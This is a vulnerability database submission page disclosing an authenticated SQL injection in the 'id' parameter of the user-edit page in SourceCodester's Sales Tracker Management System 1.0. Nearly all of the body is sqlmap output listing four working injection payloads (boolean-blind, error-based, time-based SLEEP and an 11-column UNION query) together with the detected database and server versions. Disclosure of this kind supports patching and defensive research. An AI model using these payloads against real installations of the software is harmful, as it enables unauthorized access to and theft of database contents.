Submeter #93533: Authenticated SQL Injection on Sales Tracker System When edit Usersinformação

Título	Authenticated SQL Injection on Sales Tracker System When edit Users
Descrição	# Exploit Title: Authenticated SQL Injection on Sales Tracker System When edit users # Google Dork: NA # Date: 23/2/2023 # Exploit Author: Ahmed Ismail (@MrOz1l) # Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html # Software Link: [download link if available] # Version: 1.0 # Tested on: Windows 11 # Check Detailed write-up : http://ahmedismailozil.blogspot.com/ ``` Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=6' AND 6468=6468-- rJGN Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=6' OR (SELECT 4534 FROM(SELECT COUNT(),CONCAT(0x71786b7871,(SELECT (ELT(4534=4534,1))),0x71786b7a71,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ukvi Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=6' AND (SELECT 1530 FROM (SELECT(SLEEP(5)))BhAM)-- HmJE Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=-8360' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71786b7871,0x65786e556963514467496864494e4f4577696f4e76766b69444a454b77744c685470486e744e4f41,0x71786b7a71),NULL,NULL,NULL,NULL,NULL,NULL-- - --- [09:48:13] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.25, Apache 2.4.54 back-end DBMS: MySQL >= 5.0 (MariaDB fork) ```
Fonte	⚠️ https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
Utilizador	mroz1l (UID 41497)
Submissão	23/02/2023 07h27 (há 3 anos)
Moderação	23/02/2023 16h15 (9 hours later)
Estado	Aceite
Entrada VulDB	221679 [SourceCodester Sales Tracker Management System 1.0 Edit User manage_user ID Injeção SQL]
Pontos	20

◂ Voltar Visão Geral Próximo ▸

Do you need the next level of professionalism?

Upgrade your account now!